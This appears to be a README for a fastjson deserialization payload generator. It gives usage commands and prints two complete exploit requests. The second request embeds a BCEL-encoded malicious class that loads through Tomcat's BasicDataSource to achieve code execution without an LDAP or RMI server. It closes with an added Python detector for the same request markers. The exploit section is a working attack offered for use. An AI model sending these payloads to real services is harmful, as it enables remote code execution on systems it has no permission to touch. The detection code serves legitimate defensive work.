A fastjson payload generator
Latest commit 7dda61b Aug 6, 2019

BcelPayloadGenerator

This payload uses BasicDataSource from tomcat-dbcp, so the fastjson vulnerability can be triggered without standing up a separate LDAP or RMI server.

1. Prepare the EvilConstructor .class file and place it in any folder.

2. Run the generator to produce the payload.

Command:

java -cp BcelGenerator-1.0-SNAPSHOT-jar-with-dependencies.jar com.example.App [classpath] [classname]
classpath is the directory containing EvilConstructor.class
classname is the name of the class inside EvilConstructor.class

Demo:
java -cp BcelGenerator-1.0-SNAPSHOT-jar-with-dependencies.jar com.example.App file:///D:/EvilConstructor.class EvilConstructor

3. The generated payload

First request:

{"name": 
	{
		"@type":"java.lang.Class","val":"com.sun.org.apache.bcel.internal.util.ClassLoader"
	}
}

Second request:

{"name":{"@type":"java.lang.Class","val":"org.apache.tomcat.dbcp.dbcp2.BasicData
Source"},"f":{"@type":"org.apache.tomcat.dbcp.dbcp2.BasicDataSource", "driverCla
ssName": "org.apache.log4j.spi$$BCEL$$$l$8b$I$A$A$A$A$A$A$AmR$cbN$db$40$U$3d$93$
b8vp$j$f2$80$d0$96$3e$80$bep$40$w$8b$$$a9$baAt$e5$3e$d4$m$ba$605$ZF$e9$d0$c4$8e$
s$T$c4$a2$ff$c3$9a$NT$5d$f4$D$faQm$cf$98$aa$m$g$5b$f7$5e$dd$c79s$ee$d8$3f$7f$7d$
ff$B$e0$r6b$d4p$3f$c6$D$3c$ac$e1$91$8f$x$RVc$dc$c2Z$84$c7$R$9e$I$84$afLn$dck$81j
$da$dd$X$Iv$8aC$z$d0$c8L$ae$dfMG$7dm$f7d$7f$c8J$3b$x$94$i$eeKk$7c$fe$b7$uh$9d$ec
H$k$cb$ad$a1$cc$H$5b$bb$tJ$8f$9d$v$f2m2$b9$cff$o$d0$cav$8f$cdp$a7$c8$t$ceN$95$x$
y$5b$f5$9e$93$ea$cb$5b9$$iJ$r$ab$E$8c$a4$c9$F$96$d2$83k$8c$3dgM$3e$d8$$$a5I$3b$m
$e1$c2$8c$b6$40$dc$x$a6V$e97$c6$cbZ$bcq$e4$L$PH0$878$c2$d3$E$cf$f0$9cl$dcF$rXGJ$
ca$Z$h$q$e8$o$e6E$dc$a0$Sh$5e$N$bf$ef$li$e5$b8$e3U$e9$e34wfD$N$f1$40$bb$7fI$t$ed
f$ff$cd$f8$3b$d2$tZ$J$ac$a736$beV$fa$60$L$a5$t$T$C$gc6$5dy$7d$7bV$w$8d5D$fc$c4$f
e$a9$40$f8$N$e9o3$fb$ca$bc$c2$b8$b4q$B$f1$N$95v$f5$i$c1$a7S$d4$b2$cds$84g$9c$KPG
$93$7fB$V$J$e7$96$R$d2$H$7cC$d6$e7$d8$89$d0$os$87$8cu$cfC$b6$W$bb$f3h$Q$eb$f3$ss
$a0Mk$a2$f2$9bNDX$f0n1$m$be$c3$89K$r$9b4$8f$Qg$a5H$7fXX$W$e6K$e2$e4$b2$89$3b$b8$
5b$c6$7b$e5$d4$f2$lp$8cf$3b$c3$C$A$A", "driverClassLoader":{"@type": "com.sun.or
g.apache.bcel.internal.util.ClassLoader"}}, "age":10}

Sending these two requests is all it takes.
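
For detection, the two requests above carry distinctive markers: a `java.lang.Class` entry naming the BCEL class loader or `BasicDataSource`, a `driverClassName` containing `$$BCEL$$`, and a `driverClassLoader` typed as the BCEL class loader. The following is an added example, not part of this project's code: a Python check that flags those markers in a JSON request body, with constructed sample bodies and hypothetical function and label names.

```python
import re

# Indicators copied from the two requests shown on this page.
BCEL_LOADER = "com.sun.org.apache.bcel.internal.util.ClassLoader"
DBCP_SOURCE = "org.apache.tomcat.dbcp.dbcp2.BasicDataSource"

_ESCAPE = re.compile(r"\\u([0-9a-fA-F]{4})")
_CLASS_VAL = re.compile(r'"@type":"java\.lang\.Class","val":"([^"]+)"')
_TYPE = re.compile(r'"@type":"([^"]+)"')
_BCEL_NAME = re.compile(r'"driverClassName":"[^"]*\$\$BCEL\$\$')
_LOADER_FIELD = re.compile(
    r'"driverClassLoader":\{"@type":"' + re.escape(BCEL_LOADER) + '"')


def normalize(body: str) -> str:
    """Decode JSON \\uXXXX escapes and drop whitespace, so escaped or
    line-wrapped tokens still match the indicators."""
    decoded = _ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), body)
    return re.sub(r"\s+", "", decoded)


def findings(body: str) -> list:
    """Return the sorted indicator labels present in one JSON request body."""
    text = normalize(body)
    hits = set()
    for name in _CLASS_VAL.findall(text):
        if name in (BCEL_LOADER, DBCP_SOURCE):
            hits.add("class-preload:" + name.rsplit(".", 1)[1])
    if DBCP_SOURCE in _TYPE.findall(text):
        hits.add("dbcp-datasource-type")
    if _BCEL_NAME.search(text):
        hits.add("bcel-driver-class-name")
    if _LOADER_FIELD.search(text):
        hits.add("bcel-driver-class-loader")
    return sorted(hits)


# Constructed sample bodies; the encoded class is replaced by a placeholder.
FIRST = '{"name":\n\t{"@type":"java.lang.Class","val":"' + BCEL_LOADER + '"}}'
SECOND = (
    '{"name":{"@type":"java.lang.Class","val":"org.apache.tomcat.dbcp.dbcp2.BasicData\n'
    'Source"},"f":{"\\u0040type":"' + DBCP_SOURCE + '", "driverClassName": '
    '"$$BCEL$$PLACEHOLDER", "driverClassLoader":{"@type": "' + BCEL_LOADER + '"}}, "age":10}'
)
BENIGN = '{"name":"alice","age":10}'

if __name__ == "__main__":
    for label, body in (("first", FIRST), ("second", SECOND), ("benign", BENIGN)):
        print(label, findings(body))
```

The patterns assume the key order used in the requests on this page (`@type` before `val`); a production rule should parse the JSON rather than rely on field order.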
